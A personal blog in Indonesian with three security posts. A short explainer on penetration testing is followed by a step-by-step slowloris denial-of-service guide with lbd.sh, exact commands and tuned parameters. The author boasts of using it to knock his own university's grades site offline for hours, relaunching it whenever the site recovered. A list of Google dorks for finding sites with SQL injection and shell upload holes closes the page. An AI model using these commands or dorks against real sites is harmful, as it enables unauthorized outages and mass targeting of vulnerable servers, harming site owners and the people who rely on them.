Ppentest, Win Security

Pentest

PenTest secara umum merupakan singkatan dari Penetration Test… Artinya (menurut Wikipedia dengan sedikit perubahan) adalah suatu metode untuk mengevaluasi keamanan sistem komputer atau jaringan dengan mensimulasikan serangan yang mungkin terjadi dari pihak yang tidak bertanggung jawab (misalnya Black Hat Hacker ataupun kracker)…

Jadi, secara garis besar, kegiatan PenTest merupakan kegiatan yang memiliki etika yang baik, dengan keadaan yang terbuka dan dilakukan oleh para White Hat Hacker untuk mencoba masuk ke dalam sistem dengan menggunakan berbagai teknik yang mungkin dapat dilakukan / dicoba oleh para Black Hat Hacker maupun kracker… sifatnya lebih ke defensive purpose (mencoba menyerang, kemudian memberitahukan letak celah untuk diperbaiki oleh pemilik sistem yang bersangkutan)…

Di dalam PenTest, pasti akan terdengar lagi istilah PenTester… Dari namanya, pasti sudah dapat ketebak yach ini apa… yach, PenTester ini merupakan pemainnya, pemain dari kegiatan PenTest…PenTester ini biasanya White Hat Hacker… Orang-Orang yang bekerja pada suatu instansi tertentu yang berada di bawah surat perjanjian untuk tidak membocorkan informasi apapun yang ada pada kegiatan PenTest… namun, tidak menutup kemungkinan bahwa pelaku kegiatan PenTest ini bisa juga dari kalangan Black Hat ataupun Grey Hat… terkadang, ada alasan tersendiri dari suatu instansi untuk memakai tenang yang seperti ini (semua kembali kepada kebijakan masing-masing)…

Nah, menurut salah satu penyelenggara sertifikasi yang berhubungan dengan Hacking (EC – Cou***l), pada umumnya, kegiatan Hacking dilakukan melalui life cycle seperti ini:

1. Reconnaissance
–> lebih ke arah Information Gathering… Terbagi menjadi 2, ada aktif, ada pula pasif…
–> Untuk Pasif : pencarian dilakukan dengan tidak berhubungan langsung dengan target, seperti melalui InterNet…
–> Untuk Aktif : pencarian dilakukan langsung dengan berhubungan dengan target… Biasanya dikenal dengan sebutan Social Engineering… Ingat Kevin Mitnick…

2. Scanning
–> lebih ke arah vulnerability scanning… pencarian kelemahan dari sistem yang sedang dites…

3. Gaining Access
–> lebih ke arah mencoba untuk mengambil alih sistem yang sedang dites…

4. Maintaining Access
–> lebih ke arah meninggalkan jejak tersembunyi, sebagai contoh, meletakan backdoor… pastinya, seorang Attacker tidak ingin bersusah payah lagi mengambil alih sistem yang telah berhasil diterobos… Bisa saja keesokan harinya, sang administrator telah menge-patch sistemnya, sehingga Attacker tidak dapat lagi masuk lewat celah yang sama…

5. Clearing Tracks
–> Seorang Attacker pastinya tidak ingin aktivitas Hacking mereka berujung di penjara, jadi, mereka pasti menghapus jejak mereka setelah meletakan pintu masuk lewat belakang dan setelah mereka utak-atik sistem yang berhasil diterobos…

Nah, ini merupakan gambaran Hacking yang biasa dilakukan seorang Attacker… namun, untuk kegiatan PenTest resmi, biasanya hanya sampai Gaining Access… setelah berhasil mencapai tahap 3, maka pekerjaan mereka telah dinyatakan selesai untuk setiap celah yang ditemukan…

Advertisements
Standard
./dev/sda /tmp/backtrack, Ppentest

DDos attack lagiii

Nah sekarang kita coba gunakan LBD dan Slowloris…
pertama saya sarankan jangan terlalu sering main beginian kasian karena merugikan..kemarin² saya kesal dengan kampus saya karena sudah ipk jelek pemberitahuan remedialpun ga jelas , di undur lah, nilai belum fix lah, udah tau saya mahasiswa goblok d bikin susah lagi..mana bayar 26rb/mata kuliah 😥 …jadi curhat wkwkwk…

oke, pertama gunakan lbd.sh untuk cek load balancing pada web caranya :

– Buka terminal ( ctrl + t )
– ketik cd Desktop ( tempat menyimpan kedua tools/file tadi )
– jalankan lbd.sh dengan perintah ./lbd.sh
– jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
– jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping http://www.example.com ) nanti ada ip yg muncul…
– tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

203.130.232.49 does NOT use Load-balancing.

berarti kita lanjutkan ke slowloris…. 🙂

– ketik pada terminal cd Desktop ( jika sudah langsung saja )
– ./slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
*selama melakukan dos terminal jangan d close
– tapi jika ingin lebih mantap silahkan pahami kutipan yang saya dapat dari http://forum.indonesianbacktrack.or.id/

keterangan :

* -dns : the target ( dapat berupa IP atau domain )

* -port : port yg di gunakan oleh webserver ( 80 )

* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test

* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi

* -tcpto : TCP Timeout.

* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.

untuk mengetahui limit timeoout gunakan perintah
./slowloris.pl -dns [ip/webdomain target] -port 80 -test
tunggu sampai mememukan limit timeoutnya

saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi 😦
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda…itu hanya sebagai pengalaman saja 🙂
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon

Standard
Google.dork

GoogleDork part1


 Topic

Medium Risk Vivotek Cameras Data Configuration Disclosure
Dork: “/setup/config.html” OR allinurl:”setup/parafile.html”
17.07.2012 Alejandro Leon M…
Medium Risk Elite Bulletin Board 2.1.19 SQL Injection
Dork: intext:”Powered by: Elite Bulletin Board “
16.07.2012 T0x!c
Low Risk Kool Media Converter 2.7.0 Denial Of Service
Dork: N/A
16.07.2012 Kalashinkov3
Medium Risk Gustavo Antunez SQL Injection Vulnerability
Dork: intext:”Desarrollado por Gustavo Antunez”
14.07.2012 TAURUS OMAR
High Risk Ajax Data Uploader Shell Upload
Dork: inurl:plugins/ajaxfilemanager/inc/data.php
14.07.2012 Mr.XpR
High Risk Joomla KSAdvertiser Shell Upload
Dork: inurl:index.php?option=com_ksadvertiser
14.07.2012 D4NB4R
High Risk cyberschool CMS [FCKeditor] Arbitrary File Upload Vulnerability
Dork: intext:”Web Development by IES, Inc”
11.07.2012 Am!r
Low Risk Flogr 1.7 Cross Site Scripting
Dork: inurl:”tag=” “powered by flogr v1.7”
10.07.2012 Nafsh
Medium Risk Digiport SQL Injection
Dork: powered by: Digiport
10.07.2012 POLTERGEISTH4CKE…
Medium Risk digiGALLERY SQL Injection
Dork: Powered by digiGALLERY
10.07.2012 POLTERGEISTH4CKE…
Medium Risk Word Press image-gallery plugin Sql Injection
Dork: inurl:image-gallery/?gallery_id=
07.07.2012 Mr.XpR
High Risk WordPress (wp-insert Plugin) Arbitrary File Upload Vulnerability
Dork: inurl:”wp-content/plugins/wp-insert”
06.07.2012 IrIsT.Ir
Medium Risk Arasism SQL Injection
Dork: “Powered by Arasism.com”
06.07.2012 Ehram.shahmohama…
Medium Risk 7sepehr SQL Injection
Dork: “Powered by 7sepehr.com”
06.07.2012 Ehram.shahmohama…
High Risk Word press flexiweb-form plugin Remote File Uploader
Dork: inurl:plugins/flexiweb-form/
05.07.2012 Mr.XpR
Medium Risk Webify Link Directory / SQL Injection
Dork: allinurl: index.php?page=browse&id=1
04.07.2012 Daniel Godoy
Medium Risk CLscript Classified Script 3.0 SQL Injection
Dork: allinurl: classified-listing.php?catId=
04.07.2012 Daniel Godoy
Medium Risk phpMyVisites SQL Injection
Dork: inurl:”/phpmv2/phpmyvisites.php”
04.07.2012 TAURUS OMAR
Medium Risk Octagono SQL Injection
Dork: intext:”Desenvolvido por Octagono”
03.07.2012 TAURUS OMAR
Medium Risk Geswebs SQL Injection
Dork: intext:”Sitio Web Disenado por: GesWebs”
03.07.2012 TheCyberNuxbie
Standard